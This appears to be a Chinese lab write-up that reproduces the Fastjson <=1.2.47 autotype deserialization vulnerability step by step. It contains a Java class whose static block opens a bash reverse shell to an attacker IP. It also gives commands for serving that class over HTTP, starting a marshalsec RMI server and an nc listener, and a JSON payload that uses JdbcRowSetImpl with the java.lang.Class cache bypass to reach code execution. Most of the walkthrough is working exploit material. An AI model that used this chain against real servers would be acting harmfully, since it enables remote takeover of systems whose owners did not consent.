一、漏洞特征
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson
1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过
影响版本:Fastjson <=1.2.47
访问http://192.168.232.131:8090/即可看到JSON格式的输出
修改用户信息发现有回显
二、漏洞复现
1.编译java文件
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.245.2/2333 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
Ip改成自己攻击机的ip
javac C:\Users\Administrator\Desktop\TouchFile.java
2.开启http服务
把编译好的class文件传到外网系统中,并在class文件所在的目录,Python起一个http服务
python -m http.server 4444
3.启动RMI服务
使用marshalsec项目,启动RMI服务,监听9999端口并加载远程类TouchFile.class
https://github.com/mbechler/marshalsec
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://192.168.245.2:4444/#TouchFile” 9999
4.nc开启监听
另起一个终端开启监听(nc -lvnp 2333)
5.bp发送构造包
访问192.168.232.131:8090并用bp抓包,构造如下POST请求包
{
“a”:{
“@type”:“java.lang.Class”,
“val”:“com.sun.rowset.JdbcRowSetImpl”
},
“b”:{
“@type”:“com.sun.rowset.JdbcRowSetImpl”,
“dataSourceName”:“rmi://192.168.245.2:9999/TouchFile”,
“autoCommit”:true
}
}
6.反弹shell
执行后
注意:如果反弹失败看是不是主机ip搞错了,kali的时间对不对
217
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
